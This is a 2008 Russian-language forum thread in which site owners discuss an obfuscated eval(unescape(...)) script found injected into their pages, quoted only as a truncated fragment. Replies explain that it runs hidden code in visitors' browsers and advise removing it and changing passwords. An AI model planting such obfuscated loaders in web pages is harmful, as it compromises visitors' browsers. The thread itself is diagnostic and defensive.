Код между скобками: "<!-- o --><!-- c --><script>eval(unescape("%77%69%6e%64...еще много чего")); </script>"
Спустя 16 минут, 44 секунды (29.03.2008 - 15:54) vasa_c написал(а):
Суть существования этого скрипта - пропустить все эти циферки через unescape и выполнить через eval. Что конкретно выполняется, можете узнать, пропустив самостоятельно данный текст, через unescape. Причем, выполняется, это, как вы понимаете в браузере пользователя, открывшего вашу страницу.
А меры безопастности от сути скрипта не зависят - сотрите его везде, смените пароли, поставьте нормальные антивирусы.
А меры безопастности от сути скрипта не зависят - сотрите его везде, смените пароли, поставьте нормальные антивирусы.
Спустя 2 дня, 22 часа, 34 минуты, 6 секунд (1.04.2008 - 13:28) Johnny написал(а):
а я склоняюсь к тому ,что это просто баннеры какие-нить в подарок от хостера...
Спустя 53 минуты, 37 секунд (1.04.2008 - 14:22) vasa_c написал(а):
Банеры не кодируют и не евалят
Спустя 1 месяц, 8 дней, 5 часов, 52 минуты, 30 секунд (9.05.2008 - 20:14) kirik написал(а):
у моего заказчика была проблема (правда хостинг был виндовс и сайт на асп), у них на сервер завелся вирус, и во все индексные (дефолтные) файлы он вставлял яваскрипт..очень похож на это, но я могу ошибаться...